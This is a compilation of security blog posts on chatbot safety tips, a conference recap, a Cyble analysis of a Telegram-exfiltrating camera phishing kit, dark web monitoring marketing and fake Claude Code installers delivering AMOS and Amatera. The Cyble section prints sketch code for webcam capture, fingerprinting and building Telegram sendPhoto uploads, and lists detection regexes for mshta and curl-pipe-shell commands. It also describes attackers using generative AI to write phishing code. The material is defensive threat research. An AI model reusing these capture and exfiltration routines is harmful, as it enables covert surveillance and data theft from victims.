While a diagnosis of “AI psychosis” has not yet received a clinical classification of its own, doctors are already using the term to describe patients presenting with hallucinations, disorganized thinking, and persistent delusional beliefs developed through intensive chatbot interaction. The greatest risks emerge when a bot is utilized not as a tool, but as a substitute for real-world social connection or professional psychological help.

How to keep yourself and your loved ones safe

Of course, none of this is a reason to abandon AI entirely; you simply need to know how to use it. We recommend adhering to these fundamental principles:

  • Do not use AI as a psychologist or emotional crutch. Chatbots are not a replacement for human beings. If you’re struggling, reach out to friends, family, or a mental health hotline. A chatbot will agree with you and mirror your mood — this is a design feature, not true empathy. Several U.S. states have already restricted the use of AI as a standalone therapist.
  • Opt for text over voice when discussing sensitive topics. Voice interfaces with affective dialogue create an illusion of speaking with a living person, and tend to suppress critical thinking. If you use voice mode, remain conscious of the fact that you’re speaking to an algorithm, not a friend.
  • Limit your time interacting with AI. Two thousand pages of transcripts in two months represent nearly continuous interaction. Set a timer for yourself. If chatting with a bot begins to displace real-world connections, it’s time to step back into reality.
  • Do not share personal information with AI assistants. Avoid entering passport or social security numbers, bank card details, exact addresses, or intimate personal secrets into chatbots. Everything you write can be saved in logs and used for model training — and in some cases, may become accessible to third parties.
  • Evaluate all AI output critically. Neural networks hallucinate — they generate plausible but false information and can skillfully blend lies with truth, such as citing real addresses within the context of a completely fabricated story. Always fact-check through independent sources.
  • Watch over your loved ones. If a family member begins spending hours talking to AI, becomes withdrawn, or voices strange ideas about machine consciousness or conspiracies, it’s time for a delicate but serious conversation. To manage children’s screen time, use parental control tools like Kaspersky Safe Kids, which comes as part of the comprehensive family protection solution Kaspersky Premium, along with the built-in safety filters of AI platforms.
  • Configure your safety settings. Most AI platforms allow you to disable chat history, limit data collection, and enable content filters. Spend ten minutes configuring your AI assistant’s privacy settings; while this won’t stop AI hallucinations, it will significantly reduce the likelihood of your personal data leaking. Our detailed privacy setup guides for ChatGPT and DeepSeek can help you with that.
  • Remember the bottom line: AI is a tool, not a sentient being. No matter how realistic the chatbot’s voice sounds or how understanding the response may seem, what lies beneath is an algorithm predicting the most probable next word. It has no consciousness, no intentions, no feelings.



ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities 

From March 5 to March 7, the ANY.RUN team attended RootedCON 2026 in Madrid and showcased some of our latest capabilities developed for modern SOC environments at the conference expo.

The event provided a great opportunity to meet our existing clients and connect with security teams exploring advanced threat detection solutions. 

Meeting the Community and Partners 

RootedCON is one of the largest cybersecurity conferences in Europe, bringing together thousands of security researchers, SOC analysts, and industry professionals every year. 

For us, it was a great chance to meet many of our users face-to-face, hear how SOC teams integrate ANY.RUN’s solutions into their investigation workflows, and exchange ideas with practitioners working on real-world threats every day.  

Meeting clients at RootedCON 2026
It was a pleasure to meet so many of our clients

It was great to connect with so many of our customers and discuss how they use our threat analysis and intelligence in their daily security operations. 

ANY.RUN swag
We also brought ANY.RUN swag, which didn’t stay at the booth for long 

We also had the pleasure of meeting many new companies and potential partners who were exploring ways to strengthen their threat detection and analysis workflows. Conversations like these are always valuable, they help us better understand how security teams operate and what challenges they face in modern SOC environments. 

Demonstrating New Capabilities and Exclusives 

At the booth, visitors were able to see both existing ANY.RUN solutions and several new capabilities that expand our products’ visibility and detection power. Some of these updates were shown publicly for the first time. 

RootedCON visitors were among the first to see ANY.RUN’s newest capabilities

One of the new technologies we demonstrated was automatic SSL decryption in the Interactive Sandbox.  

As phishing infrastructure increasingly relies on encrypted HTTPS traffic, many malicious actions can appear as normal web activity.  

By automatically extracting session keys from process memory and decrypting traffic internally during analysis, the sandbox provides full visibility into encrypted sessions and helps security teams increase the phishing detection rate and drive down the MTTR.



And that’s just one example of how ANY.RUN continues to evolve. More capabilities are already in development to further strengthen threat detection, investigation workflows, and cross-platform visibility for modern SOC teams. 

See You Next Year 

We’re grateful to everyone who stopped by the ANY.RUN booth to talk with the team, share feedback, or simply say hello. Events like RootedCON are always a great reminder of how strong and collaborative the cybersecurity community is. 

We’re already looking forward to returning next year. 


The post ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities  appeared first on ANY.RUN’s Cybersecurity Blog.


AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data


Executive Summary

Cyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure.

The initial access vectors are diverse, ranging from “ID Scanner” and “Telegram ID Freezing” to “Health Fund AI” lures designed to trick users into granting browser-level hardware permissions such as camera and microphone access under the pretext of verification or service recovery.

Upon gaining permissions, the underlying JavaScript workflow attempts to capture live images, video recordings, microphone audio, device information, contact details, and approximate geographic location from affected devices. This data is subsequently transmitted to attacker-controlled infrastructure, enabling operators to obtain Personally Identifiable Information (PII) and contextually sensitive information. 

Further analysis revealed indicators of potential AI-assisted code generation, including structured annotations and emoji-based message formatting embedded within the operational logic. These characteristics reflect a growing trend where threat actors leverage generative AI tools to accelerate the development of phishing frameworks.

The breadth of data collected in this campaign extends beyond traditional credential phishing and raises significant security concerns. Harvested multimedia and device telemetry could be leveraged for identity theft, targeted social engineering, account compromise attempts, or extortion, posing risks to both individuals and organizations. (Figure 1)

Figure 1 – Malicious Web Interfaces Used for Data Collection

Key Takeaways

  • Infrastructure: Extensive use of edgeone.app (EdgeOne Pages) for hosting low-cost, scalable, and highly available phishing landing pages.
  • Biometric Harvesting: The operation abuses legitimate browser APIs to access cameras, microphones, and device information after user consent.
  • C2 Mechanism: Utilization of the Telegram Bot API (api.telegram.org) as a streamlined C2 and data exfiltration channel.
  • Diverse Lures: Attackers rotate lures, including “ID Scanner” and “Health Fund AI”, to target various demographics and bypass regional security filters.
  • The phishing pages impersonate popular platforms and services, including TikTok, Telegram, Instagram, Chrome/Google Drive, and game-themed lures such as Flappy Bird, to increase victim trust.
  • Once interaction occurs, the campaign attempts to collect multiple forms of sensitive data, including photographs, video recordings, microphone audio, device information, contact details, and approximate geographic location.

Overview

  • Campaign Start: Observed since early 2026
  • Primary Objective: Harvesting victim multimedia data and device information
  • Primary Infrastructure: edgeone.app (multiple subdomains)
  • Impersonated Brands: TikTok, Telegram, Instagram, Chrome/Google Drive, Flappy Bird
  • Key Behavior: Browser permission prompts used to capture camera images, record audio/video, enumerate device metadata, retrieve geolocation information, and attempt contact list access through browser APIs.

The campaign operates as a web-based phishing framework that captures photographs directly from victims’ devices. The infrastructure hosts multiple phishing templates that impersonate verification systems or service recovery portals. The goal is to socially engineer users into granting browser permission for camera access.

Unlike traditional credential phishing pages, these pages do not primarily collect typed input. Instead, they rely on browser hardware permissions, requesting access to the device’s camera. Once permission is granted, the page silently captures a frame from the live video stream and exfiltrates it.

The use of Telegram as a data collection mechanism indicates that the operators prioritize low operational complexity and immediate access to stolen data. Since Telegram bots can receive file uploads through simple HTTP requests, attackers can directly integrate the API into client-side scripts.
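To illustrate how little is needed, here is a hedged sketch of such an upload (not the campaign’s actual code): the bot token and chat ID are placeholders, and the request is only assembled, never sent.

```javascript
// Illustrative sketch: exfiltrating a captured image through the Telegram
// Bot API requires nothing more than a multipart HTTP POST.
// The token and chat ID below are placeholders, not real values.
const BOT_TOKEN = "0000000000:PLACEHOLDER"; // hypothetical bot token
const CHAT_ID = "-1000000000000";           // hypothetical chat/channel ID

// Build the sendPhoto endpoint URL for a given bot token.
function buildSendPhotoUrl(token) {
  return `https://api.telegram.org/bot${token}/sendPhoto`;
}

// Package an image blob into multipart form data, as a client-side script
// would before calling fetch(url, { method: "POST", body: form }).
function buildPhotoForm(chatId, imageBlob) {
  const form = new FormData();
  form.append("chat_id", chatId);
  form.append("photo", imageBlob, "capture.jpg");
  return form;
}
```

Because the whole exchange is plain HTTPS to api.telegram.org, the phishing page needs no backend of its own.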

Business Impact and Potential Abuse

The data collected through this campaign provides attackers with multiple forms of sensitive personal information and contextual intelligence, thereby significantly increasing the effectiveness of follow-on attacks.

One potential abuse scenario involves identity fraud and account recovery manipulation. The campaign captures victim photographs, video recordings, and audio samples that could be used to bypass identity verification workflows used by financial platforms, social media services, or other online services that rely on biometric or video-based verification.

Additionally, the collection of device information, location data, and contact details allows attackers to build detailed victim profiles. This information may be used to perform targeted social engineering attacks, impersonate victims in communication platforms, or craft convincing fraud attempts against their contacts.

Another concerning use case involves extortion and intimidation. Because the campaign captures multimedia data, such as camera images, video recordings, and microphone audio, attackers may pressure victims by threatening to expose the collected material unless a payment is made.

For organizations, the broader business impact includes:

  • Increased risk of identity theft and account takeover attempts
  • Potential abuse of stolen biometric and multimedia data in fraud schemes
  • Targeted phishing or fraud campaigns against employees and customers
  • Reputational damage if impersonated brand identities are used in malicious campaigns

The campaign’s ability to collect multiple categories of sensitive information from a single interaction significantly amplifies the risk to both individuals and businesses.

Why does this matter?

This campaign marks a significant evolution in phishing operations, shifting from credential theft to harvesting biometric and device-level data. By abusing browser permissions to capture victims’ live images, audio, and contextual device information, threat actors can obtain high-quality identity data that is difficult to revoke or replace.

The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams across banking, fintech, telecom, and digital service platforms. Additionally, high-resolution facial images and audio samples may be weaponized for AI-driven impersonation and deepfake attacks, increasing the effectiveness of business email compromise and targeted social engineering campaigns.

For organizations, the campaign introduces elevated risks, including financial losses, regulatory non-compliance, AML exposure, reputational damage, and erosion of trust in digital onboarding systems, highlighting the growing need for stronger verification controls and browser-permission abuse detection.

Technical Analysis

The infection chain, as outlined in Figure 2, shows the stages of the attack.

Figure 2: Campaign Overview

Phishing Page Behaviour

The phishing page contains embedded JavaScript that leverages browser media APIs to access the victim’s device camera after obtaining user permission. Once access is granted, the script initializes a live video stream and processes its frames.

A capture function then renders a frame from the video feed onto an HTML5 canvas using ctx.drawImage(), effectively converting the live camera input into a static image. (see Figure 3)

The canvas content is subsequently encoded into a JPEG blob via canvas.toBlob(), creating a binary image object that can be transmitted through HTTP requests to attacker-controlled infrastructure.
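The capture flow described above can be sketched as follows. The video and canvas objects are passed in as parameters here (in a live page they come from getUserMedia and a created canvas element), so this is an illustrative reconstruction rather than the campaign’s literal code.

```javascript
// Sketch of the capture routine: draw the current video frame onto a
// canvas, then encode the canvas content as a binary JPEG object suitable
// for an HTTP upload. Object names are illustrative.
function captureFrame(video, canvas, onBlob) {
  const ctx = canvas.getContext("2d");
  // Freeze the live camera stream into a static image.
  ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
  // Encode as JPEG; onBlob receives the resulting blob.
  canvas.toBlob(onBlob, "image/jpeg", 0.9);
}
```

Parameterizing the DOM objects also makes the logic easy to exercise outside a browser with simple stubs.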

Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture

Expanded Data Collection Capabilities

Analysis of the campaign script indicates that the phishing framework performs extensive device fingerprinting and environment enumeration before initiating camera-based verification workflows.

The script collects system metadata using the following browser APIs:

  • navigator.userAgent
  • navigator.platform
  • navigator.deviceMemory
  • navigator.hardwareConcurrency
  • navigator.connection
  • navigator.getBattery

This allows the attacker to gather detailed information such as operating system type and version, device model indicators, screen resolution and orientation, browser version, available RAM, CPU core count, network type, battery level, and language settings.
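A minimal reconstruction of this enumeration step might look like the following, assuming the script bundles the values into one object before exfiltration; the function and field names are illustrative, and the navigator object is a parameter so the sketch is self-contained.

```javascript
// Assemble a device profile from a navigator-like object (in a real page,
// `nav` would be the global `navigator`). Field names are illustrative.
function buildDeviceProfile(nav) {
  const conn = nav.connection || {};
  return {
    userAgent: nav.userAgent,           // OS, browser, device indicators
    platform: nav.platform,
    memoryGB: nav.deviceMemory,         // approximate RAM, in GB
    cpuCores: nav.hardwareConcurrency,  // logical CPU core count
    networkType: conn.effectiveType,    // e.g. "4g"
    language: nav.language,
  };
}
```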

Figure 4 – Script Fetching Victim IP and Geolocation via External APIs

Additionally, the script retrieves the victim’s public IP address using services such as api.ipify.org, then enriches the geolocation using ipapi.co, enabling the collection of country, city, latitude, and longitude data. (see Figure 4)
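The two-step lookup chain can be sketched as URL construction alone (no requests are made here); the endpoints are the ones named above, while the helper names are illustrative.

```javascript
// Step 1: the public IP is fetched from api.ipify.org as JSON.
const IP_LOOKUP_URL = "https://api.ipify.org?format=json";

// Step 2: enrich the IP via ipapi.co, which returns country, city,
// latitude, and longitude for the given address.
function buildGeoLookupUrl(ip) {
  return `https://ipapi.co/${ip}/json/`;
}
```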

This telemetry is aggregated and transmitted to the attacker via the Telegram Bot API, providing operators with contextual information about the victim’s device and location prior to further data harvesting.

Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input

Beyond system profiling, the script implements multiple routines for collecting multimedia and personal data via browser permission prompts. The campaign captures several still images from both the front-facing and rear-facing cameras, records short video clips using the MediaRecorder API, and performs microphone recordings.

These recordings are packaged as JPEG, WebM video, or WebM audio files and exfiltrated via Telegram API methods such as sendPhoto, sendVideo, and sendAudio. (see Figure 5)

Figure 6 – Code Requesting Access to Victim Contacts via the Contacts API

Additionally, the script attempts to access the victim’s contact list through the Contacts Picker API (navigator.contacts.select), requesting attributes such as contact names, phone numbers, and email addresses. If granted, the selected contacts are formatted into structured messages and transmitted to the attacker. (see Figure 6)
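As an illustration, the harvested entries could be flattened into a text message like this. The array-valued fields (name, tel, email) follow the Contacts Picker API; the message layout itself is an assumption, not taken from the campaign script.

```javascript
// Format contacts returned by navigator.contacts.select() into one
// text message for exfiltration. Layout is illustrative.
function formatContacts(contacts) {
  return contacts
    .map((c, i) => {
      // Each field is an array per the Contacts Picker API.
      const name = (c.name || []).join(" ");
      const tel = (c.tel || []).join(", ");
      const email = (c.email || []).join(", ");
      return `${i + 1}. ${name} | ${tel} | ${email}`;
    })
    .join("\n");
}
```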

User Interface Manipulation

The phishing pages include interface elements designed to convince victims that the image capture process is legitimate.

For example, status messages displayed during execution may include:

  • “Capturing photo”
  • “Sending to server”
  • “Photo sent successfully”

These messages simulate the behavior of legitimate identity verification platforms and help maintain the illusion that the process is part of a valid verification workflow.

Once the image is successfully transmitted, the script terminates the camera stream and resets the interface after a short delay.

Infrastructure Observations

Analysis of the campaign revealed that the phishing pages are primarily hosted under the edgeone.app domain. Multiple variations of phishing pages were observed using similar JavaScript logic and workflow patterns.

The consistent use of the same infrastructure suggests that attackers may be operating a templated phishing kit capable of generating different themed pages while maintaining the same underlying data-collection logic.

Because the image exfiltration occurs through Telegram infrastructure, the phishing pages themselves do not require backend servers, simplifying deployment and enabling rapid rotation of phishing URLs.

Indicators of Potential Generative AI Use in Script Development

During analysis of the phishing framework, researchers observed the use of emojis embedded directly within the script’s message formatting logic. These emojis appear in structured status messages that are assembled and transmitted during the data collection workflow. The use of decorative Unicode symbols within operational code is uncommon in manually written malicious scripts but has increasingly been observed in campaigns that use generative AI tools during development. (see Figure 7)

Figure 7 – Script Fragment Suggesting AI-Assisted Development

Targeted Countries and Impersonated Brands

Infrastructure monitoring and phishing URL telemetry analysis indicate that the campaign’s infrastructure is globally accessible. Analysis of the phishing templates used in this campaign reveals that the operators impersonate a range of widely recognized consumer platforms and applications. Observed brand impersonation themes include:

  • TikTok – Free followers/engagement rewards
  • Flappy Bird – Game reward or verification workflows
  • Telegram – Account freezing or verification alerts
  • Instagram – Account recovery or follower reward systems
  • Google Chrome / Google Drive – Security verification prompts

Conclusion

Our deep-dive analysis revealed a sophisticated phishing campaign that extends beyond traditional credential theft by harvesting multimedia and device-level data through browser permission abuse.

The campaign attempts to collect photographs, video recordings, audio recordings from microphones, contact details, device information, and approximate location data directly from victims. This operation demonstrates a growing trend where attackers leverage client-side scripting and legitimate web services to collect and transmit sensitive data without relying on traditional command-and-control infrastructure.

Indicators in the script also suggest AI-assisted development, reflecting how threat actors may be using generative AI tools to accelerate the creation of phishing frameworks.

The breadth of information collected increases the potential for identity theft, targeted social engineering, account compromise attempts, and extortion. Organizations should remain cautious about phishing pages that request hardware permissions, such as camera, microphone, or contact access, particularly when originating from untrusted domains.

Cyble’s Threat Intelligence Platforms continuously monitor emerging threats, attacker infrastructure, and malware activity across the dark web, deep web, and open sources. This proactive intelligence empowers organizations with early detection, brand and domain protection, infrastructure mapping, and attribution insights. Altogether, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We have listed some essential cybersecurity best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:

  • Restrict camera permissions for unknown websites
  • Monitor outbound traffic to api.telegram.org when originating from browser sessions
  • Deploy browser security extensions capable of identifying phishing pages
  • Implement domain monitoring for suspicious infrastructure hosting phishing kits
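The second recommendation above, watching for browser-originated traffic to api.telegram.org, can be automated against existing proxy logs. The sketch below is a minimal, hypothetical illustration: the CSV log format, field order, and sample values are assumptions for demonstration, not a real proxy's schema.

```python
import csv
from io import StringIO

# Hypothetical proxy log: timestamp, source IP, user agent, destination host.
SAMPLE_LOG = """\
2026-02-01T10:00:00,10.0.0.5,Mozilla/5.0 (Windows NT 10.0) Chrome/120.0,api.telegram.org
2026-02-01T10:01:00,10.0.0.6,python-requests/2.31,example.com
2026-02-01T10:02:00,10.0.0.7,Mozilla/5.0 (Macintosh) Safari/605.1,api.telegram.org
"""

WATCHED_HOSTS = {"api.telegram.org"}
# Substrings typical of browser user agents (bot/backend clients rarely carry these).
BROWSER_MARKERS = ("Mozilla/", "Chrome/", "Safari/")

def flag_browser_telegram_traffic(log_text):
    """Return (timestamp, source_ip, host) rows where a browser-like
    user agent contacted a watched exfiltration endpoint."""
    hits = []
    for ts, src, ua, host in csv.reader(StringIO(log_text)):
        if host in WATCHED_HOSTS and any(m in ua for m in BROWSER_MARKERS):
            hits.append((ts, src, host))
    return hits
```

In this sample, the two browser sessions reaching api.telegram.org would be flagged while the scripted client contacting an ordinary host is ignored; legitimate Telegram Web usage would also match, so flagged rows warrant triage rather than automatic blocking.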

MITRE ATT&CK® Techniques

| Tactic | Technique ID | Procedure |
| --- | --- | --- |
| Initial Access | T1566 – Phishing | Phishing pages used to lure victims to malicious verification workflows. |
| Execution | T1059.007 – JavaScript | Malicious JavaScript executed in the victim’s browser. |
| Collection | T1125 – Video Capture | Camera access is used to capture photos and videos of victims. |
| Collection | T1123 – Audio Capture | Microphone access is used to record the victim’s audio. |
| Collection | T1005 – Data from Local System | Device information is collected from the browser environment. |
| Collection | T1213 – Data from Information Repositories | Contact details retrieved from the device contact list. |
| Discovery | T1082 – System Information Discovery | Device and browser information enumeration. |
| Discovery | T1614 – System Location Discovery | Victim IP and geographic location collected. |
| Exfiltration | T1567 – Exfiltration Over Web Services | Collected data transmitted to the attacker’s infrastructure. |

Indicators of Compromise (IOCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

The post AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data appeared first on Cyble.

Cyble – ​Read More

Face value: What it takes to fool facial recognition

ESET’s Jake Moore used smart glasses, deepfakes and face swaps to ‘hack’ widely-used facial recognition systems – and he’ll demo it all at RSAC 2026

WeLiveSecurity – ​Read More

The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike

Dark web intelligence

In 2026, the cyber threat landscape has become more complex and dangerous than ever. Attackers no longer operate only on the surface web; they now lurk in encrypted networks, underground marketplaces, and anonymous forums across the dark web, where stolen credentials are traded, breaches are planned, and cyberattacks take shape. 

Recent data from Cyble Research and Intelligence Labs (CRIL) shows the scale of this threat. In 2025 alone, Cyble tracked 6,046 global data breach and leak incidents, with sectors such as government and finance among the most targeted. The research has also identified thousands of enterprise credentials circulating on dark web marketplaces, often harvested by infostealer malware and sold to cybercriminals. 

For organizations that want to protect sensitive data, maintain reputation, and reduce operational risk, investing in dark web intelligence and dark web monitoring solutions is no longer optional; it’s a necessity. 

What Is Dark Web Monitoring and Why It Matters in 2026 

Dark web monitoring involves continuous scanning and intelligence gathering from hidden parts of the internet that aren’t indexed by traditional search engines, including TOR, I2P, ZeroNet, and encrypted chat channels. Cybercriminals use these platforms to trade stolen data, discuss exploits, and plan attacks. 

Effective dark web surveillance allows organizations to detect threats early. By identifying stolen credentials, leaked data, and malicious activity before the attacker acts, security teams can reset passwords, notify affected personnel, and fortify defenses, turning reactive security into a proactive advantage. 

How the Dark Web Has Evolved as a Threat Landscape 

Once considered a fringe network, the dark web has become a structured ecosystem for cybercrime. Threat actors collaborate globally with the same levels of sophistication as legitimate enterprises, complete with forums for selling vulnerabilities, reputation systems for traders, and encrypted channels for planning attacks. 

From ransomware kits to stolen databases and insider trading in sensitive corporate data, the dark web now functions as a hub for criminal collaboration and the commercialization of cyberattacks. Organizations that ignore this underground economy risk being blindsided. 

What Kind of Data Ends Up on the Dark Web 

Not all information on the dark web carries the same risk, but much of it is highly sensitive: 

  • Stolen credentials: Email/password combinations, VPN logins 

  • Breached corporate databases: Financial, HR, and client information 

  • Identity documents: Social Security numbers, passports 

  • Internal communications or proprietary IP 

Even seemingly minor leaks, if unnoticed, can be exploited for data breaches. Platforms with data leak monitoring and dark web alerts allow teams to act before these threats escalate. 

How Dark Web Monitoring Works 

Modern dark web monitoring relies on a combination of automated technologies and expert analysis. Tools crawl hidden networks, marketplaces, paste sites, and private forums to collect data. AI and machine learning analyze signals, identify patterns of malicious behavior, and provide cyber threat intelligence in actionable formats. 

Key capabilities include: 

  • Deep web and dark web scanning: Covering TOR, I2P, and other hidden networks 

  • Threat actor tracking: Linking chatter to known malicious entities 

  • Natural Language Processing (NLP): Interpreting unstructured forum text 

  • Actionable alerts: Prioritized intelligence for immediate response 

This ensures organizations can anticipate threats rather than merely respond after an incident. 
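One concrete form those actionable alerts can take is matching a leaked-credential feed against an organization's own domains. The sketch below is illustrative only: the tuple-based feed format and the sample entries are assumptions, not the schema of any real monitoring product.

```python
# Hypothetical leaked-credential feed: (email, source, first_seen) tuples.
FEED = [
    ("alice@example.com", "stealer-log-market", "2026-01-10"),
    ("bob@personalmail.net", "combo-list", "2026-01-11"),
    ("carol@example.com", "forum-dump", "2026-01-12"),
]

# Domains the organization wants monitored.
CORPORATE_DOMAINS = {"example.com"}

def corporate_exposures(feed, domains):
    """Return feed entries whose email address belongs to a monitored
    corporate domain, i.e. the entries worth alerting on."""
    return [
        entry for entry in feed
        if entry[0].rsplit("@", 1)[-1].lower() in domains
    ]
```

Entries that survive this filter are the ones a security team would route into password resets and user notification, which is the "detect early, act before exploitation" loop described above.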

Key Features to Look for in a Dark Web Monitoring Solution 

In 2026, an effective platform should offer: 

  • Continuous, real-time scanning 

  • Comprehensive monitoring of marketplaces, forums, and paste sites 

  • Automated alerts with remediation guidance 

  • Integration with existing cybersecurity systems 

  • Reporting for compliance and risk assessment 

  • Threat actor profiling and predictive analytics 

Solutions lacking contextual intelligence or actionable insights are insufficient for modern threat landscapes. 

Cyble Hawk for Advanced Threat Intelligence and Protection 

To counter cyber threats from advanced adversaries, Cyble Hawk represents the next generation of dark web monitoring and threat intelligence. Beyond merely detecting leaks, Cyble Hawk tracks threat actors, uncovers emerging attack trends, and provides actionable insights across cyber and physical domains. 

Key advantages of Cyble Hawk include: 

  • Deep Intelligence Fusion: Integrates open-source and proprietary intelligence for a 360-degree view of threats. 

  • AI & Deep Learning: Identifies threat actors and patterns in real time. 

  • Real-Time Alerts & Rapid Response: Immediate notifications for compromised credentials, breaches, and vulnerabilities. 

  • Incident Response & Resilience: Supports frameworks to continuously strengthen the cybersecurity posture. 

Cyble Hawk doesn’t just monitor; it empowers organizations to detect, respond, and protect against the most advanced cyber threats before they escalate. 

Dark Web Monitoring Across Industries 

Different sectors face unique exposures, and tailored monitoring is critical: 

  • Financial Services: Detect compromised customer databases, prevent fraud schemes 

  • Healthcare: Identify patient data leaks, PHI exposure, and ransomware chatter 

  • Retail & E-Commerce: Monitor credential-stuffing lists, card dumps, and phishing campaigns 

  • Manufacturing & Critical Infrastructure: Track trade-secret exposure and APT activity 

  • Government & Public Sector: Detect contractor data leaks, APT campaigns, and impersonation threats 

Building a Dark Web Monitoring Strategy in 2026 

A robust strategy combines continuous monitoring with proactive response: 

  1. Asset Prioritization: Identify the most critical data, accounts, and intellectual property 

  2. Continuous Intelligence Gathering: Real-time scanning of forums, marketplaces, and paste sites 

  3. Automated, Actionable Alerts: Ensure teams can respond quickly to compromised assets 

  4. Integration with Cybersecurity Infrastructure: Link dark web intelligence with firewalls, identity protection, and incident response tools 

  5. Employee Awareness: Educate staff to recognize phishing and social engineering attempts 

This approach transforms dark web intelligence into a defensive advantage, reducing exposure and operational risk. 

Frequently Asked Questions (FAQs) 

Q.1: What is dark web intelligence? 

Dark web intelligence is information collected from unindexed networks and underground forums to detect threats, leaked data, or compromised credentials. 

Q.2: Can dark web monitoring prevent attacks? 

It doesn’t prevent breaches outright, but early detection of leaks or malicious activity enables mitigation before exploitation. 

Q.3: Who should use dark web monitoring? 

Any organization handling sensitive data, including enterprises, government agencies, and financial institutions. 

Q.4: How does Cyble Hawk enhance monitoring? 

By combining AI, threat actor tracking, and real-time alerts, Cyble Hawk delivers actionable intelligence that allows organizations to detect, respond, and fortify defenses effectively. 

Conclusion 

In 2026, the dark web remains one of the most dynamic and high-risk areas of the cyber threat landscape. Organizations can no longer afford to rely on reactive security. By leveraging advanced monitoring platforms like Cyble Hawk, security teams gain early visibility into compromised data, track threat actors, and respond to risks before they escalate into major incidents. 

Cyble Hawk combines AI-driven intelligence, real-time alerts, and expert threat analysis to help organizations detect threats faster and strengthen their cybersecurity posture. Schedule a personalized demo to see Cyble Hawk in action and learn how it can help protect your organization’s critical assets. 

The post The Ultimate Guide to Dark Web Monitoring in 2026: Protect Your Data Before Attackers Strike appeared first on Cyble.

Cyble – ​Read More

Cyber fallout from the Iran war: What to have on your radar

The cybersecurity implications of the war in the Middle East extend far beyond the region. Here’s where to focus your defenses.

WeLiveSecurity – ​Read More

AMOS and Amatera disguised as AI agents | Kaspersky official blog

We recently discussed how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they’re on Windows, it’s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.

The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings its own set of risks, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. They type in a search query and are served a sponsored link leading to a malicious installation guide. Let’s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.

The search query

So, a user starts looking for a place to download the Anthropic agent and types something like “Claude Code download” into the search bar. The search engine returns a list of links, with “sponsored links” (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Interestingly, the site itself is built on Squarespace, a legitimate website builder that helps it bypass anti-phishing filters.

Search result examples

Search results with ads in Romania and Brazil

The attackers’ site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real deal, it prompts the user to copy and run a command. However, once executed, it installs not an AI agent but malware. Essentially, this is just another flavor of the ClickFix attack — one that has earned its own nickname: InstallFix.

Malicious website

Malicious site mimicking installation instructions

Claude Code website

Genuine Claude Code site with installation instructions

Malicious payload

Just like with the original Claude Code, the command for macOS attempts to install an application using the curl command-line utility. In reality, it deploys the AMOS spyware — previously described by our experts on Securelist — which was used in a similar past campaign.

On Windows, the malware is installed using the system utility mshta.exe, which executes HTML Applications, instead of the curl utility that the genuine Claude Code installer uses. This command deploys the Amatera infostealer, which harvests browser data, crypto-wallet information, and files from the user folder, then sends them to a remote server at 144{.}124.235.102.
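Both delivery paths described here leave a recognizable shape in process command lines: mshta.exe invoked with a remote URL on Windows, or curl output piped straight into a shell on macOS. A minimal heuristic sketch along these lines is shown below; the patterns are illustrative assumptions, not Kaspersky's detection logic, and a production rule set would be far broader.

```python
import re

# Illustrative patterns for InstallFix-style one-liners:
#  - mshta.exe fetching a remote HTA (Windows path described above)
#  - curl output piped directly into a shell (macOS path described above)
SUSPICIOUS_PATTERNS = [
    re.compile(r"mshta(\.exe)?\s+https?://", re.IGNORECASE),
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh", re.IGNORECASE),
]

def is_suspicious_cmdline(cmdline):
    """Return True if a process command line matches any heuristic."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)
```

For example, a command line such as `mshta.exe https://evil.example/p.hta` or `curl -fsSL https://evil.example/i.sh | sh` would match, while an ordinary curl download to a file would not; since legitimate installers also use the curl-pipe-shell idiom, matches should feed triage or EDR enrichment rather than outright blocking.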

How to keep your company safe

Interest in AI agents continues to grow, and the emergence of new tools and their rising popularity are creating fresh attack vectors. Specifically, attempting to seek out third-party AI tools can not only jeopardize the source code of projects on the victim’s computer but also lead to the compromise of secrets, confidential corporate files, and user accounts.

To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our training platform: Kaspersky Automated Security Awareness. Incidentally, it includes a specialized lesson on the use of AI in corporate environments.

Additionally, we recommend protecting all corporate devices with proven cybersecurity solutions.

We also suggest checking out our previously published article on three approaches to minimizing the risks of using shadow AI.

Kaspersky official blog – ​Read More